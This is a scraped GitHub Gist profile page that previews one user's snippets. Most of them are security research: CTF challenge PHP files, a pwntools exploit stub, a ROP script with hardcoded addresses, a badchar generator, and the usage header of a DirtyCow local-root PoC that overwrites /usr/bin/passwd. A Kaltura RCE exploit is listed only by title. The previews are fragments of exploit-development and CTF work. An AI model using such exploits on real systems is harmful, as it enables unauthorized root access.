Skip to content

Instantly share code, notes, and snippets.

Robin Verton rverton

Block or report user

Report or block rverton

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile

Keybase proof

I hereby claim:

  • I am rverton on github.
  • I am roob ( on keybase.
  • I have a public key ASB7AIRlWYr7z6mxQzopO21ynOCT3d1UjcsegZtkAcnNtwo

To claim this, I am signing this object:

rverton /
Created Oct 24, 2017
Kaltura <= 13.1.0 Remote Code Execution (CVE-2017-14143)
rverton /
Created Jul 10, 2017
Make a screenshot with a headless google chrome in python
# Install chromedriver from
import os
from optparse import OptionParser
from selenium import webdriver
from import Options
CHROME_PATH = '/usr/bin/google-chrome'
rverton / readflag.php
Created Apr 9, 2017
ASIS CTF 2017, Tar Bomb Challenge
View readflag.php
header('Access-Control-Allow-Origin: *');
$remote = $_SERVER['REMOTE_ADDR'];
if ($remote === '' || $remote === '::1') {
$flag = fopen("/flag", "r") or die("Unable to open file!");
echo fread($flag,filesize("/flag"));
} else {
echo 'what do you expect to see here?';
rverton / admin_console.php
Created Apr 9, 2017
ASIS CTF 2017, Tar Bomb Challenge
View admin_console.php
if ($_COOKIE['tar'] !== 'super-secret-cookie-you-never-know') {
echo "Try better cookie, bro!";
if (isset($_POST['url']) && isset($_POST['challenge'])) {
$url = $_POST['url'];
rverton /
Created Mar 26, 2017
exploit for level1.bin (nullcon 2017)
# exploit for level1.bin (nullcon 2017)
from pwn import *
def add_book(p):
p.recvuntil('Enter book name: ')
rverton /
Created Nov 4, 2016
ROP Primer level2 - open, read and print flag file
import struct
def p(value):
return struct.pack('<L', value);
writeable_buffer = 0x080ca004
open_addr = 0x80515f0
read_addr = 0x80516a0
write_addr = 0x8051700
rverton /
Created Oct 25, 2016
Generate a bytearray for badchar detenction.
This script generates a bytearray for badchar detection
and is similar to's bytearray function.
Create bytearray.txt and bytearray.bin (0-255)
$ python
Create bytearray.txt and bytearray.bin and exclude chars
rverton / cowroot.c
Created Oct 21, 2016
CVE-2016-5195 (DirtyCow) Local Root PoC
View cowroot.c
* (un)comment correct payload first (x86 or x64)!
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
rverton /
Created Aug 2, 2016
Test file upload with flask (Python3)
from io import BytesIO
def test_file_upload(client):
data = {
'field': 'value',
'file': (BytesIO(b'FILE CONTENT'), 'test.csv')
rv ='/upload', buffered=True,
You can’t perform that action at this time.